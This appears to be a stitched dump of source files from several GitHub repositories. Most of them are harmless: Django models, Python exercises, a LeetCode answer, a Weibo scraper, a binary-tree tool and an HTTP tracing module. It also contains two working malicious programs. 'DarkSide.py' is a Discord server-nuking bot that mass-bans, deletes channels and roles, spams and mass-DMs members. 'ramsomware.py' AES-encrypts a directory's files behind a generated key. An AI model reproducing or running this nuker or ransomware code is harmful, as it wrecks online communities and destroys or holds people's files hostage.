def __str__(self):
return self.name
class Group(models.Model):
name = models.CharField(max_length=128)
members = models.ManyToManyField(
Person,
through='Membership',
through_fields=('group', 'person'),
)
def __str__(self):
return self.name
class Membership(models.Model):
group = models.ForeignKey(Group, on_delete=models.CASCADE)
person = models.ForeignKey(Person, on_delete=models.CASCADE)
inviter = models.ForeignKey(
Person,
on_delete=models.CASCADE,
related_name="membership_invites",
)
invite_reason = models.CharField(max_length=64)
class MyUser(models.Model):
account = models.CharField(max_length=10)
pwd = models.CharField(max_length=100)
class IMG(models.Model):
img = models.ImageField(upload_to='img')
name = models.CharField(max_length=20, null=True)
arthor = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=True)
# 每张图片对应作者 也许还要加上上传时间
up_load_time = models.DateTimeField(null=True)
# 创建django的model时,有DateTimeField、DateField和TimeField三种类型可以用来创建日期字段,
# 其值分别对应着datetime()、date()、time()三中对象。这三个field有着相同的参数auto_now和auto_now_add,
``` |
{
"source": "Jonathan1214/learn-python",
"score": 4
} |
#### File: BasicExerciseAndKnowledge/w3cschool/n14_split_to_PrimeNumber.py
```python
def is_prime(num):
'''
判断参数num是否是素数
'''
for i in range(2, num/2+1):
if num % i == 0:
return False
return True
def find_factor(num):
'''
找因子 忽略1和本身
'''
lt = []
for i in range(2, num/2+1):
if num % i == 0:
lt.append(i)
return lt
def split_to_PrimeList(num):
'''
如果num是合数 返回质因数分解元素 如90拆成2 3 3 5 储存在list中返回
若是素数 返回空
'''
try: # 如果num是素数 lt则为空 引发IndexError
lt = find_factor(num) # 临时储存num的因子
# if not lt:
# return lt
factor_lt = [] # 储存质因子
factor_lt.append(lt[0]) # 显然 lt的第一个元素必然是质数
factor_lt.append(lt[-1]) # 第一个和最后一个的乘积就是这个数
while not is_prime(factor_lt[-1]): # 当质因数list中最后一个大数不是素数
lt = find_factor(factor_lt[-1])
factor_lt[-1] = lt[0]
factor_lt.append(lt[-1])
return factor_lt
except IndexError:
return None
def print_PrimeFactors(lt, num):
if lt:
print '\n'
i = 1
for item in lt:
if i != len(lt):
print '%d *' % item,
else:
print '%d = %d' % (item, num),
i += 1
else:
print '\n%d不是素数' % num
if __name__ == '__main__':
# num = int(raw_input('请输入一个合数:'))
# print_Prime(split_to_PrimeList(num), num)
for num in range(1,1000):
print_PrimeFactors(split_to_PrimeList(num), num)
```
#### File: BasicExerciseAndKnowledge/w3cschool/n26_fibs_RecursiveWay.py
```python
def factorial(num):
if num in (0,1):
return 1
return factorial(num-1) * num
print(factorial(5))
```
#### File: BasicExerciseAndKnowledge/w3cschool/n51_bitwise_and.py
```python
for i in range(10):
for j in range(10):
if i & j:
print '%d & %d = %d' % (i, j, i&j)
def convert_to_2base(num):
'''
把一个正整数转化为二进制数
以字符串返回
'''
def helper(num):
while num / 2:
yield (num % 2)
num /= 2
yield 1
lt = list(helper(num))[::-1]
str_ = ''.join([str(item) for item in lt])
return str_
print int(convert_to_2base(10), 2)
```
#### File: BasicExerciseAndKnowledge/w3cschool/n67_swap_max_min.py
```python
lt = [32, 31, 43, 23]
print lt
def swap_max_and_first(list_):
max_ = list_[0]
index = 0
for i in range(len(list_)):
if max_ < list_[i]:
max_ = list_[i]
index = i
list_[0], list_[index] = list_[index], list_[0]
def swap_min_and_last(list_):
min_ = list_[0]
index = 0
for i in range(len(list_)):
if min_ > list_[i]:
min_ = list_[i]
index = i
list_[-1], list_[index] = list_[index], list_[-1]
swap_min_and_last(lt)
print lt
swap_max_and_first(lt)
print lt
``` |
{
"source": "Jonathan1214/myCollege",
"score": 2
} |
#### File: myCollege/DeepLearning/minist_loader.py
```python
import pickle
import gzip
import numpy as np
def load_data():
f = gzip.open('./data/', 'rb')
```
#### File: LeetCode/question2/solution.py
```python
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
ll1, ll2 = l1, l2
node = ListNode(0)
head = node
carry = 0
while ll1 and ll2:
val = (ll1.val+ll2.val+carry) % 10
carry = (ll1.val+ll2.val+carry) // 10
node.next = ListNode(val)
node = node.next
ll1 = ll1.next
ll2 = ll2.next
if ll1:
node.next = ll1
elif ll2:
node.next = ll2
elif carry:
node.next = ListNode(carry)
return head.next
else:
return head.next
while node.next:
tmp = carry + node.next.val
node.next.val = tmp % 10
carry = tmp // 10
node = node.next
if carry:
node.next = ListNode(carry)
return head.next
# if __name__ == "__main__":
# l1 = ListNode(9)
# l1.next = ListNode(9)
# l2 = ListNode(1)
# s = Solution()
# rt = s.addTwoNumbers(l1,l2)
# while rt:
# print(rt.val)
# rt = rt.next
```
#### File: myCollege/WeiboSpider/HTMLDownloader.py
```python
import requests
class HTMLDownloader:
''' downloader '''
def __init__(self):
print('启动下载器,开启 Session:')
self.session = requests.Session()
def deal_with_copied_cookies_from_chrome(self, cookies_file_path):
'''将从浏览器复制的字符串型 cookies 处理成字典
paras: 文件路径'''
with open(cookies_file_path, 'r', encoding='utf-8') as f:
cookies = f.read()
cookie = cookies.split("; ")
cookies = {}
for c in cookie:
tmp = c.split("=")
cookies[tmp[0]]= tmp[1]
return cookies
def update_cookies(self, cookies):
self.session.cookies.update(cookies)
def get_a_page(self, url, cookies, headers):
'''获取一个页面
para:url[str] cookies[file_path]'''
self.update_cookies(self.deal_with_copied_cookies_from_chrome(cookies)) # 更新 cookies
# 设置 verify = False
return self.session.get(url, headers=headers, verify=False)
``` |
{
"source": "Jonathan-1407/python-binary-tree",
"score": 3
} |
#### File: python-binary-tree/src/binarytree.py
```python
from __future__ import print_function
from os import getenv
from dotenv import load_dotenv
class Node:
def __init__(self, label, parent):
self.label = label
self.left = None
self.right = None
self.parent = parent
# get & set functions
def getLabel(self):
return self.label
def setLabel(self, label):
self.label = label
def getLeft(self):
return self.left
def setLeft(self, left):
self.left = left
def getRight(self):
return self.right
def setRight(self, right):
self.right = right
def getParent(self):
return self.parent
def setParent(self, parent):
self.parent = parent
class BinarySearchTree:
def __init__(self):
self.root = None
def insert(self, label):
new_node = Node(label.replace(';', '').replace('|', ','), None)
if self.empty():
self.root = new_node
else:
curr_node = self.root
while curr_node is not None:
parent_node = curr_node
if new_node.getLabel() < curr_node.getLabel():
curr_node = curr_node.getLeft()
else:
curr_node = curr_node.getRight()
if new_node.getLabel() < parent_node.getLabel():
parent_node.setLeft(new_node)
else:
parent_node.setRight(new_node)
new_node.setParent(parent_node)
def empty(self):
if self.root is None:
return True
return False
def __InOrderTraversal(self, curr_node):
nodeList = []
if curr_node is not None:
nodeList.insert(0, curr_node)
nodeList = nodeList + self.__InOrderTraversal(curr_node.getLeft())
nodeList = nodeList + self.__InOrderTraversal(curr_node.getRight())
return nodeList
def getRoot(self):
return self.root
def __isRightChildren(self, node):
if(node == node.getParent().getRight()):
return True
return False
def __reassignNodes(self, node, newChildren):
if(newChildren is not None):
newChildren.setParent(node.getParent())
if(node.getParent() is not None):
if(self.__isRightChildren(node)):
node.getParent().setRight(newChildren)
else:
node.getParent().setLeft(newChildren)
def traversalTree(self, traversalFunction=None, root=None):
if(traversalFunction is None):
return self.__InOrderTraversal(self.root)
else:
return traversalFunction(self.root)
def __str__(self):
list = self.__InOrderTraversal(self.root)
str = ""
for x in list:
str = str + " " + x.getLabel().__str__()
return str
def orderBy(node, key: int):
return node.split(',')[key]
def InPreOrder(curr_node):
nodeList = []
if curr_node is not None:
nodeList = nodeList + InPreOrder(curr_node.getLeft())
nodeList.insert(0, curr_node.getLabel())
nodeList = nodeList + InPreOrder(curr_node.getRight())
return nodeList
def getTreeData(tree, order: int):
sorted_tree: list = sorted(tree.traversalTree(InPreOrder, tree.root),
key=lambda node: orderBy(node, order - 1))
return sorted_tree
```
#### File: python-binary-tree/src/home.py
```python
from os import system, name, path, getcwd
from pathlib import Path
from time import time
from .inputdata import getInputData, viewGeneratedInputData
from .outputdata import getOutputData, viewOrderedOutputData
def makeDefaultDirs():
path_dir = "public/files/"
path = Path(path_dir)
path.mkdir(parents=True, exist_ok=True)
inputFile = Path(f"{path_dir}Input.txt")
outputFile = Path(f"{path_dir}Output.txt")
inputFile.touch(exist_ok=True)
outputFile.touch(exist_ok=True)
makeDefaultDirs()
def drawWelcome():
print("▒█▀▀█ ▒█▀▀█ ▒█▀▀▀█ ▒█▀▀█ ▒█▀▀█ ░█▀▀█ ▒█▀▄▀█ ░█▀▀█ ▒█▀▀█ ▀█▀ ▒█▀▀▀█ ▒█▄░▒█")
print("▒█▄▄█ ▒█▄▄▀ ▒█░░▒█ ▒█░▄▄ ▒█▄▄▀ ▒█▄▄█ ▒█▒█▒█ ▒█▄▄█ ▒█░░░ ▒█░ ▒█░░▒█ ▒█▒█▒█")
print("▒█░░░ ▒█░▒█ ▒█▄▄▄█ ▒█▄▄█ ▒█░▒█ ▒█░▒█ ▒█░░▒█ ▒█░▒█ ▒█▄▄█ ▄█▄ ▒█▄▄▄█ ▒█░░▀█")
print("")
def drawEndExcecution():
print("+-----------------------------------------+")
print("| |")
print("| \033[35m** Ejecucion Finalizada **\033[0m |")
print("| |")
print("+-----------------------------------------+")
def validateOption(message: str):
option = input(message)
return option
def clear():
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
clear()
drawWelcome()
def getFilePath(file_name: str, title: str = "Archivo Generado"):
dir_path = path.abspath(getcwd())
print(f'\033[92m\t === {title} ===\033[0m\n')
print(
'\tEl archivo se encuentra en: \n')
print(
f"\t\033[96m{dir_path}/public/files/{file_name}\033[0m\n")
def menu():
print("==== Bienvenid@ ====")
print("1 - Generar archivo con datos de entrada")
print("2 - Generar archivo de salida")
print("3 - Ver datos generados del archivo de entrada")
print("4 - Ver datos ordenados del archivo de salida")
print("5 - Salir")
def outputMenu():
print("\t==== Ordernar por? ====")
print("\t1 - Carnet")
print("\t2 - Nombres y apellidos")
print("\t3 - Carrera\n")
print('\t\tPresiona (\033[4menter\033[0m) para omitir')
option = validateOption(
"\tIngresa una opcion, por defecto \033[93mCarnet\033[0m: ")
return option
option_menu = 0
while True:
try:
menu()
option_menu = int(validateOption("Selecciona una opcion: "))
if option_menu == 1:
clear()
print('\tDeseas ingresar la cantidad de datos a generar?')
print('\t\tPresiona (\033[4menter\033[0m) para omitir')
length = validateOption(
"\tIngresa la cantidad de datos, por defecto \033[93m100\033[0m: ")
start_time = time()
if length != "":
getInputData(int(length))
else:
getInputData(100)
end_time = round((time() - start_time), 6)
clear()
getFilePath('Input.txt')
print(
'\n\tTiempo de ejecucion: \033[94m{}seg\033[0m\n'.format(end_time))
elif option_menu == 2:
clear()
output_option = outputMenu()
start_time = time()
if output_option != "":
getOutputData(int(output_option))
else:
getOutputData(1)
end_time = round((time() - start_time), 6)
clear()
getFilePath('Output.txt', 'Archivo Generado y Ordenado')
print(
'\n\tTiempo de ejecucion: \033[94m{}seg\033[0m\n'.format(end_time))
elif option_menu == 3:
clear()
viewGeneratedInputData()
elif option_menu == 4:
clear()
viewOrderedOutputData()
elif option_menu == 5:
clear()
drawEndExcecution()
break
else:
clear()
print("\n *** Opcion no valida ***\n")
except:
clear()
print("\033[91m** Ingresa un valor valido **\033[0m\n")
```
#### File: python-binary-tree/src/outputdata.py
```python
from .binarytree import BinarySearchTree, getTreeData
from os import getenv
from dotenv import load_dotenv
def viewOrderedOutputData():
file = open(getenv('FILE_OUTPUT_PATH'), 'r')
print(file.read())
file.close()
def getDataFile():
students = []
file = open(getenv('FILE_INPUT_PATH'), 'r')
file_total_lines = file.readlines()
for student in file_total_lines:
students.append(student.strip())
file.close()
return students
def getOutputData(order: int):
available_order = [1, 2, 3]
if order not in available_order:
order = 1
tree = BinarySearchTree()
students = getDataFile()
for student in students:
tree.insert(student)
if order == 3:
order += 1
students_tree: list = getTreeData(tree, order)
file = open(getenv('FILE_OUTPUT_PATH'), 'w')
for item in students_tree:
file.write(f"{item}\n")
file.close()
``` |
{
"source": "jonathan1929-cmis/jonathan1929-cmis-cs2",
"score": 4
} |
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/countup.py
```python
def main(n):
if n == 10:
print "Blastoff!"
elif n > 10:
print "Number needs to be 10 or under."
else:
print n
main(n + 1)
main(1)
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/SimpleProgram.py
```python
def calculation(age):
yearsleft=75-int(age)
return yearsleft
def storytelling(name,favmov,hobby,father,mother,yearsleft,crush,friend,vehicle):
print """------------------------------------------------------------
On a bright sunny day you, """ + str(name) +""", was walking down the street. You were thinking about """ + str(crush) + """ and felt {}. You were back from a day of {} at work. For a long time you wanted to become {}, but rethought your choice and decided to be {}. Considering you've only got {} numbers of years left to live, you don't really have a lot of time. While walking, you see {} across the street, and {} pulling over next to her in a {}. Only problem is, """.format(favmov,hobby,father,mother,yearsleft,crush,friend,vehicle) + str(friend) +""" has been dead for 5 years..."""
def main():
name=raw_input("What is your name?:")
age=raw_input("How old are you?:")
sex=raw_input("What is your sex?:")
hobby=raw_input("What do you enjoy doing in your free time?:")
drink=raw_input("What is your favorite drink?:")
vehicle=raw_input("What kind of vehicle would you like?:")
childhood=raw_input("What was your favorite childhood object?:")
crush=raw_input("What is the name of your crush?:")
father=raw_input("Father's occupation?(add a/an before):")
mother=raw_input("Mother's occupation?(add a/an before):")
catch=raw_input("What if your favorite catchphrase?:")
friend=raw_input("Who is your best friend?:")
thrillride=raw_input("Describe the first thrill ride you ever got on:")
oneself=raw_input("Desribe yourself in one word:")
favmov=raw_input("What was your reaction to your favorite movie?:")
kill=raw_input("If you were confronted by a serial killer, how would you act?:")
yearsleft=calculation(age)
story=storytelling(name,favmov,hobby,father,mother,yearsleft,crush,friend,vehicle)
print story
main()
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/Test1.py
```python
import math
def circle_diameter(r):
pi = (math.pi)
return math.sqrt(r/pi)*2
def output(Area1,Area2,Area3,Total):
out = """Circle Diameter
c1 {}
c2 {}
c3 {}
total {}""".format(Area1, Area2, Area3, Total)
return out
def addvalues(D1,D2,D3):
value = D1 + D2 + D3
return value
def main():
Area1=int(raw_input("c1:"))
Area2=int(raw_input("c2:"))
Area3=int(raw_input("c3:"))
D1 = circle_diameter(Area1)
D2 = circle_diameter(Area2)
D3 = circle_diameter(Area3)
Total = addvalues(D1,D2,D3)
print output(Area1,Area2,Area3,Total)
main()
```
#### File: jonathan1929-cmis/jonathan1929-cmis-cs2/WHILE.py
```python
def count(x):
while x > 0:
print x
x -= 1
while x < 0:
print x
x += 1
#count(-10)
def countfrom(x, y):
if x <= y:
while x <= y:
print x
x += 1
elif x >= y:
while x >= y:
print x
x -= 1
#countfrom(0, 9)
#countfrom(10, 0)
def oddodds(x, stack):
if x <= 0:
while x <= 0:
if not x % 2 == 0:
stack += -x
x += 1
if x >= 0:
while x >= 0:
if not x % 2 == 0:
stack += x
x -= 1
print stack
#oddodds(10, 0)
#oddodds(20, 0)
def grid(w, h):
out = " "
out += "."*w
h -= 1
while h>0:
print out
h-=1
return out
print grid(20,5)
``` |
{
"source": "Jonathan2000s/Nuker-Termux-v1.0",
"score": 3
} |
#### File: Jonathan2000s/Nuker-Termux-v1.0/DarkSide.py
```python
print("[ > BOT BY: Jonathan < ] \n")
import os
import colorama
from colorama import Fore
import discord
import asyncio
from discord.ext import commands
intents = discord.Intents.default()
intents.members = True
###########SETUP###############
prefix = "!"
token = "<PASSWORD>"
spam_messages = "@everynoe"
massdm = "Nuke"
rolenames = "Nuker"
channels = "Nuker"
###############################
def Clear():
os.system('cls')
bot = commands.Bot(command_prefix = prefix)
bot.remove_command("help")
os.system('cls' if os.name == 'nt' else 'clear')
@bot.event
async def on_ready():
Clear()
print(f"""
{Fore.RED}
░░░░░░ ░░░░░ ░░░░░░ ░░ ░░ ░░░░░░░ ░░ ░░░░░░ ░░░░░░░
▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒ ▒▒
▒▒ ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒ ▒▒ ▒▒ ▒▒▒▒▒
▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓ ▓▓
██████ ██ ██ ██ ██ ██ ██ ███████ ██ ██████ ███████
[ คำสั่ง !nuke ]
""")
print("\033[1;31;40m_________________________________________________________")
print("BOT Is Online prefix = ! ")
#help commamd
@bot.command()
async def help(ctx):
await ctx.message.delete()
embed = discord.Embed(color=000000, timestamp=ctx.message.created_at)
embed.set_author(name="TERMINAL")
embed.add_field(name="`NUKE`", value="- destroys the server")
embed.add_field(name="`SPAM`", value="- spams the server")
embed.add_field(name="`BAN`", value="- bans all members in the server")
embed.add_field(name="`KICK`", value="- kicks all members in the server")
embed.add_field(name="`MASSDM`", value="- dms everyone in the server with the message provided")
embed.add_field(name="`SNAME`", value="- changes the server name!")
embed.add_field(name="`ROLES`", value="- deletes all roles in the server, and creates new ones")
embed.add_field(name="`DCHANNELS`", value="- deletes all channels in the server")
embed.add_field(name="`SCHANNELS`", value="- spams channels in the server")
embed.set_image(url="")
await ctx.send(embed=embed)
#commands
@bot.command()
async def spam(ctx):
guild = ctx.message.guild
await ctx.message.delete()
await ctx.send("`Bot is now spamming!`")
while True:
for channel in guild.text_channels:
await channel.send(spam)
#AC
@bot.command(pass_conext=True)
async def ban(ctx):
await ctx.message.delete()
guild = ctx.message.guild
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("``Banned all!``")
@bot.command(pass_conext=True)
async def kick(ctx):
await ctx.message.delete()
guild = ctx.message.guild
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print("User" +member.name + "Has Been Kicked")
except:
pass
await ctx.send("`Kicked all!`")
@bot.command(pass_context=True)
async def massdm(ctx):
guild = ctx.message.guild
for member in guild.members:
await asyncio.sleep(0)
try:
await member.send(massdm)
await ctx.send("`Message Has Been Sent`")
except:
pass
@bot.command(pass_context=True)
async def roles(ctx, amount):
guild = ctx.message.guild
for role in guild.roles:
try:
await role.delete()
print(f"Role: {role} has been deleted")
except:
pass
print(f"Role: {role} could not be deleted")
for i in range(amount):
try:
await guild.create_role(name=rolenames)
print("Role has been created")
except:
print("Role could not be created")
@bot.command(pass_context=True)
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.message.guild
#banning
print("ENTERING: Banning members")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("`Banned all!`")
#deleting channels
print("ENTERING: Deleting channels")
try:
for channel in ctx.guild.channels:
await channel.delete()
print("Channel deleted")
except:
pass
print("Channel could not be deleted")
#creating channels
print("ENTERING: Creating channels")
try:
for i in range(50):
guild = ctx.message.guild
await guild.create_text_channel(channels)
print("Channel created")
except:
pass
print("Channel could not be created")
#deleting roles
print("ENTERING: deleting roles")
for role in guild.roles:
try:
await role.delete()
print(f"Role: {role} has been deleted")
except:
pass
print(f"Role: {role} could not be deleted")
#creating role
print("ENTERING: creating roles")
for i in range(50):
try:
await guild.create_role(name=rolenames)
print("Role has been created")
except:
print("Role could not be created")
print("ENTERING: Spamming messages")
while True:
for channel in guild.text_channels:
await channel.send(spam_messages)
@bot.command()
async def Sname(ctx, msg=None):
if msg is not None:
await ctx.guild.edit(name=msg)
else:
await ctx.send('``what do you want me to change the server name to?``')
@bot.command()
async def dchannels(ctx):
for channel in ctx.guild.channels:
await channel.delete()
@bot.command(pass_context=True)
async def schannels(ctx):
await ctx.message.delete()
await ctx.send("`Creating channels...`")
guild = ctx.message.guild
for i in range(50):
await guild.create_text_channel(random.choice(channels))
for channel in list(ctx.message.guild.channels):
pass
bot.run(token)
``` |
{
"source": "Jonathan20021/ransomware",
"score": 2
} |
#### File: Jonathan20021/ransomware/ramsomware.py
```python
import os
import random
import hashlib
import socket
#to use these modules install pycryptodome
from Crypto.Util import Counter
from Crypto.Cipher import AES
username = os.getlogin()
#This only works for me, you must put the path where the ransomware will work on your machine.
#This is just an experiment, if you want to make it global use os.environ['HOME'] Be careful wiht that
destination = r'C:\Users\{}\desktop\proyectos_libres\ransonwre_dir'.format(username)
destination = os.path.abspath('')
files = os.listdir(destination)
files = [x for x in files if not x.startswith('.')]
#You can add any extensions
extensions = [".txt", ".jpg", '.jpeg', 'mp4', 'mp3', 'png',]
def hash_key():
hashnumber = destination + socket.gethostname() + str(random.randint(0, 10000000000000000000000000000000000000000000000))
hashnumber = hashnumber.encode('utf-8')
print(hashnumber)
hashnumber = hashlib.sha512(hashnumber)
hashnumber = hashnumber.hexdigest()
new_key = []
for k in hashnumber:
if len(new_key) == 32:
hashnumber = ''.join(new_key)
break
else:
new_key.append(k)
return hashnumber
def encrypt_and_decrypt(text, crypto, block_size = 16):
with open(text, 'r+b') as encrypted_file:
unencrypted_content = encrypted_file.read(block_size)
while unencrypted_content:
encrypted_content = crypto(unencrypted_content)
if len(unencrypted_content) != len(encrypted_content):
raise ValueError('')
encrypted_file.seek(- len(unencrypted_content), 1)
encrypted_file.write(encrypted_content)
unencrypted_content = encrypted_file.read(block_size)
def discover(key):
files_list = open('files_list', 'w+')
for extension in extensions:
for file in files:
if file.endswith(extension):
files_list.write(os.path.join(file)+ '\n')
files_list.close()
del_space = open('files_list', 'r')
del_space = del_space.read().split('\n')
print(del_space)
del_space = [i for i in del_space if not i == '']
print(del_space)
if os.path.exists('hash_file'):
decrypt_field = input('Enter the symmetric key: ')
hash_file = open('hash_file', 'r')
key = hash_file.read().split('\n')
key = ''.join(key)
if decrypt_field == key:
key = key.encode('utf-8')
counter = Counter.new(128)
crypto = AES.new(key, AES.MODE_CTR, counter = counter)
cryp_files = crypto.decrypt
for element in del_space:
encrypt_and_decrypt(element, cryp_files)
else:
counter = Counter.new(128)
crypto = AES.new(key, AES.MODE_CTR, counter = counter)
hash_file = open('hash_file', 'wb')
hash_file.write(key)
hash_file.close()
cryp_files = crypto.encrypt
for element in del_space:
encrypt_and_decrypt(element, cryp_files)
def main():
hashnumber = hash_key()
print(hashnumber)
print(len(hashnumber))
hashnumber = hashnumber.encode('utf-8')
discover(hashnumber)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit()
``` |
{
"source": "Jonathan2106/pcaptomsc",
"score": 2
} |
#### File: Jonathan2106/pcaptomsc/pcaptomsc.py
```python
import sys
import getopt
from tshark import tshark
import pcaptolist
import mscgenhandler
def replacestrings(text):
string_to_replace = [
["\"", "\\\""],
["→", "->"]
]
ret = text
for strings in string_to_replace:
ret = ret.replace(strings[0], strings[1])
return ret
def listtomscgenformat(list_of_el):
ret = ""
ret += "msc {\n\n"
list_of_actors = []
for el in list_of_el:
list_of_actors.append(el["source"])
list_of_actors.append(el["destination"])
# actors = list(set(list_of_actors)) -> can't maintain order
actors = list(dict.fromkeys(list_of_actors))
ret += " \"" + "\", \"".join(actors) + "\";\n"
for el in list_of_el:
# make it temporary
current_el = el
# concat the text
ret += (" \"" + current_el["source"]+ "\"=>\""+ current_el["destination"]
+ "\" [label=\"("+ current_el["protocol"] +") " + replacestrings(current_el["info"]) + "\"];\n")
ret += "}"
return ret
def listtosequencediagramformat(list_of_el):
ret = ""
for el in list_of_el:
# make it temporary
current_el = el
# replacing unreadable character
current_el["source"] = current_el["source"].replace(":", ".")
current_el["destination"] = current_el["destination"].replace(":", ".")
# concat the text
ret += (current_el["source"]+ " -> "+ current_el["destination"]
+ ": *"+ current_el["protocol"] + "*: " + current_el["info"] + "\n")
return ret
def listtohackmdformat(list_of_el):
ret = ""
ret += "```sequence\n"
# reuse the sequence diagram format
ret += listtosequencediagramformat(list_of_el)
# exit sequence of msc generator
ret += "```\n"
return ret
def main(argv):
tshark_path = tshark.get_tshark_path()
if (tshark_path == 0):
print("tshark not found. Please install Wireshark.")
return 0
inputfile = ''
format = ""
txt_output = False
image_output = False
output_file = ''
try:
# opts is a list of returning key-value pairs, args is the options left after striped
# the short options 'hi:o:', if an option requires an input, it should be followed by a ":"
# the long options 'ifile=' is an option that requires an input, followed by a "="
opts, args = getopt.getopt(argv,"hi:o:f:",["ifile=","ofile=", "format="])
except getopt.GetoptError:
print("pcaptomsc.py -i <inputfile> -o <output_file>")
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print("pcaptomsc.py -i <inputfile> -o <output_file>")
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-o", "--ofile"):
if arg[-4:] == ".txt":
print("outputing to ", arg)
output_file = arg
txt_output = True
if arg.split('.')[-1] in ("png", "svg", "eps"):
if format == "mscgen":
image_output = True
image_output_file = arg
else:
print("image output must use mscgen as format parameter.\n")
print("please specify the format parameter before output parameter.\n")
elif opt in ("-f", "--format"):
if arg == "hackmd":
format = "hackmd"
if arg == "sequencediagram":
format = "sequencediagram"
if arg == "mscgen":
format = "mscgen"
## Process the input to list
packet_list = pcaptolist.pcaptolist(tshark_path, inputfile)
print("input has been read : ", inputfile)
## Process to output
if format == "":
format = "hackmd"
print("Format configuration not existed, default (hackmd Format) will be selected.")
if format == "hackmd":
output = listtohackmdformat(packet_list)
elif format == "sequencediagram":
output = listtosequencediagramformat(packet_list)
elif format == "mscgen":
output = listtomscgenformat(packet_list)
## output
if txt_output == True:
f = open(output_file, "wt", encoding='utf-8')
f.write(output)
f.close()
print("text file generated : ", output_file)
if image_output == True:
mscgen_output_file = image_output_file[:-4] + ".msc"
f = open(mscgen_output_file, "wt", encoding='utf-8')
f.write(output)
f.close()
print("mscgen file generated : ", mscgen_output_file)
if image_output == True:
image_format = image_output_file.split('.')[-1]
res = mscgenhandler.mscgenhandler(image_format, mscgen_output_file, image_output_file)
if res == 0:
print("image generated : ", image_output_file)
else:
print("failed to generate image.")
## print output on terminal
print("process finsihed.\n")
print("Printing output to terminal.\n\n")
print(output)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "Jonathan339/Asteroid",
"score": 3
} |
#### File: Jonathan339/Asteroid/bala.py
```python
class Bala:
def __init__(self):
self.image
self.rect = self.image.get_rect(x=x, y=y)
```
#### File: Jonathan339/Asteroid/nave.py
```python
from animation import Animation
from constants import *
class Nave(Animation):
def __init__(self, image, x, y):
super().__init__(image, x, y)
self.vida = 3
self.disparo = []
self.disparo = []
def quitar_vida(self)->int:
"""
Resta vida a la nave.
"""
if self.vida > 0 and self.vida < 3:
self.vida -= 1
else:
pass
return self.vida
def agrega_vida(self)-> int:
"""
Agrega vida a la nave.
"""
if self.vida > 0 and self.vida < 3:
self.vida += 1
else:
pass
return self.vida
``` |
{
"source": "jonathan-3play/htrace",
"score": 3
} |
#### File: htrace/htrace/__init__.py
```python
import logging
import re
import requests
import datetime
import dateparser
USER_AGENT = "htrace-0.1.0/python-3.9"
ACCEPT_VALUES = {
"jld": "application/ld+json",
"jsonld": "application/ld+json",
"json-ld": "application/ld+json",
}
JSON_TIME_FORMAT = "%Y-%m-%dT%H:%M:%S%z"
"""datetime format string for generating JSON content
"""
def getLogger():
return logging.getLogger("htrace")
def datetimeToJsonStr(dt):
if dt is None:
return None
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
# Naive timestamp, convention is this must be UTC
return f"{dt.strftime(JSON_TIME_FORMAT)}Z"
return dt.strftime(JSON_TIME_FORMAT)
def dtnow():
"""
Get datetime for now in UTC timezone.
Returns:
datetime.datetime with UTC timezone
Example:
.. jupyter-execute::
import igsn_lib.time
print(igsn_lib.time.dtnow())
"""
return datetime.datetime.now(datetime.timezone.utc)
def utcFromDateTime(dt, assume_local=True):
# is dt timezone aware?
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
if assume_local:
# convert local time to tz aware utc
dt.astimezone(datetime.timezone.utc)
else:
# asume dt is in UTC, add timezone
dt = dt.replace(tzinfo=datetime.timezone.utc)
return dt
# convert to utc timezone
return dt.astimezone(datetime.timezone.utc)
def datetimeFromSomething(V, assume_local=True):
if V is None:
return None
if isinstance(V, datetime.datetime):
return utcFromDateTime(V, assume_local=assume_local)
if isinstance(V, float) or isinstance(V, int):
# from time.time(), which is offset from epoch UTC
dt = datetime.datetime.fromtimestamp(V)
#dt = dt.replace(tzinfo=datetime.timezone.utc)
if assume_local:
dt = dt.astimezone()
else:
dt = dt.astimezone(datetime.timezone.utc)
return dt
#return utcFromDateTime(
# datetime.datetime.fromtimestamp(V), assume_local=assume_local
#)
if isinstance(V, str):
return utcFromDateTime(
dateparser.parse(V, settings={"RETURN_AS_TIMEZONE_AWARE": True}),
assume_local=assume_local,
)
return None
def dtdsecs(t):
return t.seconds + t.microseconds / 1000000.0
def responseSummary(resp, tstart, tend):
"""
JSON-able conversion of requests response info dict
Args:
resp: A requests response-like thing
Returns:
dict
"""
def httpDateToJson(d):
if d is None:
return d
dt = datetimeFromSomething(d)
return datetimeToJsonStr(dt)
def addHistory(r):
row = {
"url": r.url,
"status_code": r.status_code,
"result": None,
"elapsed": dtdsecs(r.elapsed),
"headers": {},
}
for k in r.headers:
row["headers"][k.lower()] = r.headers.get(k)
row["content_type"] = row["headers"].get("content-type", None)
row["last_modified"] = httpDateToJson(row["headers"].get("last-modified", None))
row["date"] = httpDateToJson(row["headers"].get("date", None))
loc = r.headers.get("Location", None)
if loc is not None:
row["result"] = f"Location: {loc}"
else:
row["result"] = "<< body >>"
return row
elapsed = 0.0
rs = {
"request": {},
"responses": [],
"resources_loaded": [],
"tstart": datetimeToJsonStr(datetimeFromSomething(tstart, assume_local=False)),
"tend": datetimeToJsonStr(datetimeFromSomething(tend, assume_local=False)),
"elapsed": elapsed,
}
try:
rs["resources_loaded"] = resp.resources_loaded
except AttributeError as e:
pass
rs["request"]["url"] = resp.request.url
rs["request"]["headers"] = {}
